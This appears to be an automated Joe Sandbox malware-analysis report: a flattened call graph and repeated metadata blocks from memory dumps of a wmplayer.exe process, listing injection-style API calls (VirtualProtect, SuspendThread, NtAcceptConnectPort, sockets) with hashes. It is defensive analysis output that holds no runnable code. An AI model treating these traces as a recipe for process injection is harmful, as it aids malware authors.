38569->38570 38571 21ab2fe2eb2 38569->38571 38570->38571 38571->38568 38572 21ab2fe84c0 SetErrorMode 38573 21ab2fe84d4 38572->38573 38574 21ab2feb936 socket 38573->38574 38575 21ab2feb9c3 socket 38574->38575 38576 21ab2feb97a getsockopt 38574->38576 38578 21ab2feb9e3 38575->38578 38576->38575 38579 21ab2fe2d80 38580 21ab2fe2d90 NtAcceptConnectPort 38579->38580 38581 21ab2fe2d9f 38579->38581 38580->38581 38582 21ab30135f4 38583 21ab3013612 malloc 38582->38583 38584 21ab301362c 38582->38584 38583->38584 38585 7df4f81b34a8 38586 7df4f81b34be 38585->38586 38588 7df4f81b352f 38585->38588 38587 7df4f81b34fe SetWinEventHook 38586->38587 38586->38588 38587->38588 38589 21ab2fd69b8 38590 21ab2fd69d4 38589->38590 38591 21ab2fd69d9 GetProcAddressForCaller 38590->38591 38592 21ab2fd69e2 38590->38592 38591->38592 38593 21ab2fd2978 38594 21ab2fd29a6 VirtualProtect 38593->38594 38595 21ab2fd299e 38593->38595 38597 21ab2fd29cb 38594->38597 38598 21ab2fd29c1 38594->38598 38595->38594 38596 21ab2fd2a0d VirtualProtect 38596->38598 38597->38596 38599 21ab2fdbef0 38600 21ab2fdbf19 38599->38600 38601 21ab2fdbf47 LoadLibraryA 38600->38601 38602 21ab2fdbf29 38600->38602 38601->38602 38603 21ab2fd74f0 38606 21ab2fd7528 38603->38606 38604 21ab2fd7782 38605 21ab2fd75c3 VirtualFree 38605->38606 38606->38604 38606->38605 38607 7df4f8208c38 SetErrorMode 38608 7df4f8208c4c 38607->38608 38609 7df4f820c8f2 socket 38608->38609 38610 7df4f820c936 closesocket 38609->38610 38611 7df4f820c981 38609->38611 38613 7df4f820c987 socket 38610->38613 38611->38613 38614 7df4f820c99f 38613->38614 38615 7df4f81b47b8 38616 7df4f81b47ee 38615->38616 38617 7df4f81b4b08 38616->38617 38627 7df4f81b1708 38616->38627 38621 7df4f81b4909 calloc 38623 7df4f81b482b 38621->38623 38625 7df4f81b4a12 38621->38625 38622 7df4f81b4958 38624 7df4f81b49e3 SendMessageA 38622->38624 38623->38617 38623->38621 38623->38622 38624->38625 38636 7df4f81b2730 NtQuerySystemInformation free NtQuerySystemInformation 38625->38636 38628 
7df4f81b1715 38627->38628 38629 7df4f81b173b 38627->38629 38628->38629 38630 7df4f81b171b RtlAddFunctionTable 38628->38630 38631 7df4f81b1740 38629->38631 38630->38629 38632 7df4f81b176f 38631->38632 38633 7df4f81b1760 VirtualProtect 38631->38633 38634 7df4f81b180d 38632->38634 38635 7df4f81b17e9 VirtualProtect 38632->38635 38633->38632 38634->38623 38635->38632 38637 21ab2fd262c 38638 21ab2fd265f 38637->38638 38640 21ab2fd2680 Thread32First 38638->38640 38644 21ab2fd2738 38638->38644 38639 21ab2fd288e 38643 21ab2fd2685 38640->38643 38641 21ab2fd2771 SuspendThread 38641->38644 38642 21ab2fd272f CloseHandle 38642->38644 38643->38642 38644->38639 38644->38641 38645 7df4f81a22cc 38647 7df4f81a22ee 38645->38647 38646 7df4f81a276d 38647->38646 38653 7df4f81a1290 38647->38653 38651 7df4f81a2329 38651->38646 38652 7df4f81a2754 SetTimer 38651->38652 38652->38646 38654 7df4f81a129d 38653->38654 38655 7df4f81a12c3 38653->38655 38654->38655 38656 7df4f81a12a3 RtlAddFunctionTable 38654->38656 38657 7df4f81a12c8 38655->38657 38656->38655 38658 7df4f81a12f7 38657->38658 38659 7df4f81a12e8 VirtualProtect 38657->38659 38660 7df4f81a1395 38658->38660 38661 7df4f81a1371 VirtualProtect 38658->38661 38659->38658 38660->38651 38661->38658 38662 7df4f8204290 38664 7df4f82042c3 38662->38664 38663 7df4f82044c0 38664->38663 38673 7df4f8201708 38664->38673 38668 7df4f82042fe 38668->38663 38669 7df4f8204453 38668->38669 38671 7df4f82043f0 calloc 38668->38671 38682 7df4f82031bc free 38668->38682 38670 7df4f820449b SendMessageA 38669->38670 38670->38663 38671->38668 38674 7df4f820173b 38673->38674 38675 7df4f8201715 38673->38675 38677 7df4f8201740 38674->38677 38675->38674 38676 7df4f820171b RtlAddFunctionTable 38675->38676 38676->38674 38678 7df4f8201760 VirtualProtect 38677->38678 38680 7df4f820176f 38677->38680 38678->38680 38679 7df4f820180d 38679->38668 38680->38679 38681 7df4f82017e9 VirtualProtect 38680->38681 38681->38680 38682->38668 38683 21ab2fdbc28 38684 21ab2fdbc2d 38683->38684 
38686 21ab2fdbc56 38683->38686 38687 21ab2fdba4c 38684->38687 38688 21ab2fdba6d 38687->38688 38689 21ab2fdbb44 CreateWindowExW 38688->38689 38690 21ab2fdbba1 38688->38690 38689->38690 38690->38686 38691 7df4f821063c 38692 7df4f821064e 38691->38692 38693 7df4f8210655 38691->38693 38693->38692 38694 7df4f821068e free 38693->38694 38694->38692 38695 21ab2fdcee0 38696 21ab2fdcef3 38695->38696 38700 21ab2fdcf49 38695->38700 38701 21ab2fda7e0 38696->38701 38698 21ab2fdcf05 38699 21ab2fdcf28 ReadFile 38698->38699 38699->38700 38702 21ab2fda847 38701->38702 38703 21ab2fda800 38701->38703 38702->38698 38703->38702 38704 21ab2fda86b malloc 38703->38704 38704->38702 38705 21ab2fdcc9c 38706 21ab2fdccba 38705->38706 38719 21ab2fdcd34 38705->38719 38707 21ab2fdcce0 38706->38707 38708 21ab2fdce5f 38706->38708 38706->38719 38709 21ab2fdce2e 38707->38709 38713 21ab2fdccf7 38707->38713 38710 21ab2fda7e0 malloc 38708->38710 38711 21ab2fda7e0 malloc 38709->38711 38712 21ab2fdce42 38710->38712 38711->38712 38716 21ab2fdce93 ReadFile 38712->38716 38714 21ab2fdcded 38713->38714 38715 21ab2fdcd2b 38713->38715 38713->38719 38732 21ab2fdbc64 38714->38732 38715->38719 38720 21ab2fdc994 38715->38720 38716->38719 38721 21ab2fdcc66 38720->38721 38731 21ab2fdc9ce 38720->38731 38721->38719 38722 21ab2fdcc4f 38723 21ab2fda9d4 free 38722->38723 38723->38721 38724 21ab2fdcbca 38724->38722 38746 21ab2fdc2d0 38724->38746 38726 21ab2fdcbc2 38751 21ab2fee398 free free 38726->38751 38731->38721 38731->38724 38731->38726 38739 21ab2fee7e8 free free 38731->38739 38740 21ab2fedbcc 38731->38740 38750 21ab2fed730 malloc 38731->38750 38733 21ab2fdbc92 38732->38733 38734 21ab2fdbd60 38732->38734 38733->38734 38735 21ab2fdbcb5 OpenFileMappingW 38733->38735 38734->38719 38735->38734 38736 21ab2fdbcd2 MapViewOfFile 38735->38736 38737 21ab2fdbd57 CloseHandle 38736->38737 38738 21ab2fdbcf0 38736->38738 38737->38734 38738->38737 38739->38731 38741 21ab2fedbde 38740->38741 38742 21ab2fedbe5 38740->38742 38741->38731 
38742->38741 38743 21ab2fedc24 38742->38743 38744 21ab2fedc1e free 38742->38744 38743->38741 38752 21ab3014c3c 38743->38752 38744->38743 38747 21ab2fdc313 38746->38747 38749 21ab2fdc87a 38746->38749 38748 21ab2fdc7c0 VirtualAlloc 38747->38748 38747->38749 38748->38749 38749->38722 38750->38731 38751->38724 38753 21ab3014c4a 38752->38753 38754 21ab3014c6c 38752->38754 38753->38754 38755 21ab3014c65 free 38753->38755 38754->38741 38755->38754 38756 21ab2fd515c 38769 21ab2fe2a20 38756->38769 38758 21ab2fd5374 38759 21ab2fd51b5 38759->38758 38760 21ab2fd5367 38759->38760 38772 21ab2fe2dac 38759->38772 38781 21ab2fe290c 38760->38781 38767 21ab2fe2dac NtAcceptConnectPort 38768 21ab2fd52f2 38767->38768 38778 21ab2fe2ddc 38768->38778 38770 21ab2fe2a45 38769->38770 38771 21ab2fe2a30 NtAcceptConnectPort 38769->38771 38770->38759 38771->38770 38773 21ab2fd5244 38772->38773 38774 21ab2fe2dbc NtAcceptConnectPort 38772->38774 38773->38760 38775 21ab2fe2cac 38773->38775 38774->38773 38776 21ab2fe2cbf NtAcceptConnectPort 38775->38776 38777 21ab2fd5290 38775->38777 38776->38777 38777->38767 38777->38768 38779 21ab2fe2df0 38778->38779 38780 21ab2fe2dec NtAcceptConnectPort 38778->38780 38779->38760 38780->38779 38782 21ab2fe2920 38781->38782 38783 21ab2fe291c NtAcceptConnectPort 38781->38783 38782->38758 38783->38782
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                                                                                                                                                                                                          • String ID: H$H
                                                                                                                                                                                                                                                                                                          • API String ID: 874015164-136785262
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 733f9d242d84350ec482b170d0dc0851649cc193ca1a5017b9f1424b40398fe9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66B12F7060CB888BD764DF18D885AAAB7E5FFD5310F404A2EE58FC3251DA34E545CB86

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatPathUsercalloc
                                                                                                                                                                                                                                                                                                          • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                                                                                                                                                                                          • API String ID: 4207655178-84560671
                                                                                                                                                                                                                                                                                                          • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                          • Instruction ID: e223ee4dbbf5ed40f6477b25e42edebbb070ff4a3657ff8e4fb084c360673a5f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63A25C7051CB888FE375DF1898897EAB7E4FBA9701F500A2FD48AC3251DB74A5518B83
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                          • API String ID: 167522227-2547889144
                                                                                                                                                                                                                                                                                                          • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                                                                                                                                          • Instruction ID: b9ad6576a9a9384c7686aeaa3cf457bfcaeef1ae115d877d7191817bd73836ca
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20918070A48A894BFB95EB64D9986AB73E1FF94301F40872AD54FC7191DF78E804C782

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                          • Instruction ID: bf972d49c62478aaf627f3f23814676249c66efdc323a255554f1222e3827fcc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0318F31208A488FF795EF38D8D87AA77E5FBA8314F50062AE45BC21D0DB34D955CB82

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuerySystem$malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1603438391-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bc7880a8700dacad39c518c9bd8fc875244ffc3df34e874a8ca13a14ac018e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD0119346599458FE799EB24EC5CAA677F1FFE4301F548069A44BC22A0DF3CE505CB42

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuerySystem$free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3648661966-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6878ed6d48af6add7b11d44b40f43b16020158646f4cf55b4d6e1bfb17d2e3cf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD0131346589458FF789EB25EC58B6677E1FFA4301F444529A44BC21A0DF7CD544CB41

                                                                                                                                                                                                                                                                                                          Control-flow Graph

control_flow_graph 295, starting at 21ab2fe3158 (graph not reproduced; named API call in the graph: NtAcceptConnectPort)
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ea4604b3bf47958f468317763ac49714dd6e0898c9258db44d61da4a9b5bce9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A421D5707099C84FF750AEAD88CC77976E1E7B9305F50053FE549C3250D629DA588B43

                                                                                                                                                                                                                                                                                                          Control-flow Graph

control_flow_graph 398, starting at 21ab2fd262c (graph not reproduced; named API calls in the graph: Thread32First, SuspendThread, CloseHandle)
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                          • Instruction ID: e7357069af6cccd7732ef109dab6d8f260855e91b14f24d6df5b2b40e47c905a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C891273024DA498BEB68DB38D8996B973D1FB75358F14015FD04AC7186DA34EA62CBC3
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2248422592-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000021AB2FD5367), ref: 0000021AB2FE2DEC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModeclosesocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID: rE\
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CloseHandleMappingOpenView
                                                                                                                                                                                                                                                                                                          • String ID:
